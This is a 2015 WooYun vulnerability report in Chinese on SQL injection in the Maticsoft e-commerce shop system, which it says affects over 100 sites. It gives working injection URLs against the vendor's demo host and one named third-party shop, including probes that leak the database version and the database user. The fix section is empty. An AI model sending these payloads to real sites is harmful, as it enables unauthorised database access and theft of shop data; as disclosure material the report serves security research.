漏洞概要
关注数(24)
关注此漏洞
漏洞标题:动软商城系统2枚SQL注入/影响大量商城站点(100+案例)
提交时间:2015-10-15 11:25
修复时间:2015-11-29 11:26
公开时间:2015-11-29 11:26
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
Tags标签:
无
漏洞详情
披露状态:
2015-10-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-29: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
挺有名的商城系统
详细说明:
其实写那么多案例就想上个首页,嘻嘻~
想必都知道这个商城系统挺有名也挺多人用的。案例我就不可能一一列出来了~
注入点:
看看官方demo吧:
http://shop1.maticsoft.cn//NodeProdCategory.aspx?action=GetChildNode&CategoryId=2%27
明明显显的mssql注入,也有极小部分是mysql数据库的注入

爆数据库版本:
http://shop1.maticsoft.cn//NodeProdCategory.aspx?action=GetChildNode&CategoryId=2%20and%20@@version>0--

看看user吧,想怎么注就怎么注入:
http://shop1.maticsoft.cn//NodeProdCategory.aspx?action=GetChildNode&CategoryId=2%20and%20user>0--

捕获一个mysql注入的:
http://www.syltmall.com/NodeProdCategory.aspx?action=GetChildNode&CategoryId=1'

121个案例献上证明:
注入点二:

测试案例:
漏洞证明:

漏洞证明:
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)
漏洞评价:
评论